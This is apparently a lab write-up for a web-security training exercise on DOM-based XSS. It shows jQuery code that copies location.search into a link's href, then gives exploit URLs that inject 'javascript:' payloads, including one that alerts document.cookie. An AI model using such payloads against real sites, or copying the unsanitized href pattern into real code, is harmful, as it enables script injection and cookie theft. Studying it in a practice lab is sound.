📌 Info

This lab contains a DOM-based cross-site scripting (XSS) vulnerability in the submit feedback page.

It uses the jQuery library's $ selector function to find an anchor element, and changes its href attribute using data from location.search.

🎯 Goal

Make the "back" link alert document.cookie.

⚠️ Vulnerable Code

The page has a Go Back link that is updated with jQuery code like this:

$('a#backLink').attr('href', location.search);

• This means it reads from location.search (the URL query string).
• It then assigns the value directly to the href attribute without any filtering or sanitization.

🛠️ Exploitation Steps

1. Normal feedback URL:

   <https://0ad4007004b024ff80b5b2a600a2002c.web-security-academy.net/feedback?returnPath=/>
   
   

2. Inject JavaScript into the returnPath parameter:

   <https://0ad4007004b024ff80b5b2a600a2002c.web-security-academy.net/feedback?returnPath=javascript:alert(1)>
   
   

   → The Back link’s href becomes:

   <a id="backLink" href="javascript:alert(1)">Back</a>
   
   

3. For the lab’s goal, modify the payload to steal cookies:

   <https://0ad4007004b024ff80b5b2a600a2002c.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)>
   
   

4. When you click the Back link → the browser executes the JavaScript → document.cookie is displayed.